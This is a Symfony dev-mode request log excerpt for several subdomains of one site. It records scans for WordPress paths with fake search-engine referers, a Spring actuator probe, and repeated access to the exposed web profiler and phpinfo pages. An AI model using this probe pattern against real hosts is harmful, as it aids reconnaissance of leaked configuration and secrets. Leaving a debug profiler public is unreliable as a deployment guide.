  7144. [2025-12-20 11:45:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/images" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/images\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7145. [2025-12-20 11:45:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/js/dist/development" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/js/dist/development\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7146. [2025-12-20 11:45:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7147. [2025-12-20 11:45:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/css" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/css\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7148. [2025-12-20 11:45:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7149. [2025-12-20 11:45:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin/js/widgets" (from "https://www.google.fr/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin/js/widgets\" (from \"https://www.google.fr/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7150. [2025-12-20 11:45:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/backups-dup-lite" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/backups-dup-lite\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7151. [2025-12-20 11:45:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/languages" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/languages\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7152. [2025-12-20 11:45:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads" (from "https://www.bing.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads\" (from \"https://www.bing.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7153. [2025-12-20 11:45:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-content/uploads/2025" (from "https://www.google.de/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-content/uploads/2025\" (from \"https://www.google.de/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7154. [2025-12-20 11:46:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/IXR" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/IXR\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7155. [2025-12-20 11:46:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text" (from "https://www.yahoo.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text\" (from \"https://www.yahoo.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7156. [2025-12-20 11:46:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/Text/Diff/Engine" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/Text/Diff/Engine\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7157. [2025-12-20 11:46:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/block-supports" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/block-supports\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7158. [2025-12-20 11:46:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/blocks/code" (from "https://www.google.com/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/blocks/code\" (from \"https://www.google.com/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7159. [2025-12-20 11:46:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/rest-api" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/rest-api\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7160. [2025-12-20 11:46:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-includes/theme-compat" (from "https://www.google.co.uk/")" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-includes/theme-compat\" (from \"https://www.google.co.uk/\") at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7161. [2025-12-20 11:46:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
  7162. [2025-12-20 11:46:58] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://www.unda.co/_profiler/phpinfo","method":"GET"} []
  7163. [2025-12-20 11:47:20] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  7164. [2025-12-20 11:47:21] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  7165. [2025-12-20 11:47:21] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  7166. [2025-12-20 11:47:22] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  7167. [2025-12-20 11:47:22] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  7168. [2025-12-20 11:47:23] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  7169. [2025-12-20 11:49:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=time","method":"GET"} []
  7170. [2025-12-20 11:49:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  7171. [2025-12-20 11:55:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"223e5d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/223e5d?panel=cache","method":"GET"} []
  7172. [2025-12-20 11:55:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  7173. [2025-12-20 11:58:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=time","method":"GET"} []
  7174. [2025-12-20 11:58:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  7175. [2025-12-20 11:58:24] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7176. [2025-12-20 11:58:30] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
  7177. [2025-12-20 11:59:33] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  7178. [2025-12-20 11:59:37] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
  7179. [2025-12-20 12:02:47] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  7180. [2025-12-20 12:03:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=events","method":"GET"} []
  7181. [2025-12-20 12:03:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  7182. [2025-12-20 12:06:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=dump","method":"GET"} []
  7183. [2025-12-20 12:06:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  7184. [2025-12-20 12:08:04] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  7185. [2025-12-20 12:08:06] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
  7186. [2025-12-20 12:08:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00ba25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/00ba25?panel=request","method":"GET"} []
  7187. [2025-12-20 12:08:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  7188. [2025-12-20 12:09:11] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  7189. [2025-12-20 12:09:14] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
  7190. [2025-12-20 12:09:43] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  7191. [2025-12-20 12:09:46] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
  7192. [2025-12-20 12:19:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"223e5d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/223e5d?panel=config","method":"GET"} []
  7193. [2025-12-20 12:19:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  7194. [2025-12-20 12:22:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=validator","method":"GET"} []
  7195. [2025-12-20 12:22:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  7196. [2025-12-20 12:28:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/gateway/routes"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/gateway/routes\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7197. [2025-12-20 12:30:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"223e5d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/223e5d?panel=time","method":"GET"} []
  7198. [2025-12-20 12:30:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  7199. [2025-12-20 12:30:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"819624","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/819624?panel=dump","method":"GET"} []
  7200. [2025-12-20 12:30:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  7201. [2025-12-20 12:30:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c78c5b","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c78c5b?panel=security","method":"GET"} []
  7202. [2025-12-20 12:30:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  7203. [2025-12-20 12:33:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=swiftmailer","method":"GET"} []
  7204. [2025-12-20 12:33:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  7205. [2025-12-20 12:35:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"479de6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/479de6?panel=db","method":"GET"} []
  7206. [2025-12-20 12:35:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  7207. [2025-12-20 12:35:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0314c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a0314c","method":"GET"} []
  7208. [2025-12-20 12:35:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  7209. [2025-12-20 12:36:02] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  7210. [2025-12-20 12:36:08] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
  7211. [2025-12-20 12:36:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=security","method":"GET"} []
  7212. [2025-12-20 12:36:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  7213. [2025-12-20 12:36:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"418d56","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/418d56?panel=events","method":"GET"} []
  7214. [2025-12-20 12:36:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  7215. [2025-12-20 12:37:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  7216. [2025-12-20 12:40:06] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  7217. [2025-12-20 12:40:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"223e5d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/223e5d?panel=request","method":"GET"} []
  7218. [2025-12-20 12:40:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  7219. [2025-12-20 12:41:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5ebd67","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5ebd67?panel=exception","method":"GET"} []
  7220. [2025-12-20 12:41:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  7221. [2025-12-20 12:42:56] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"36d0fa","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/36d0fa/search/results?limit=10&method=GET","method":"GET"} []
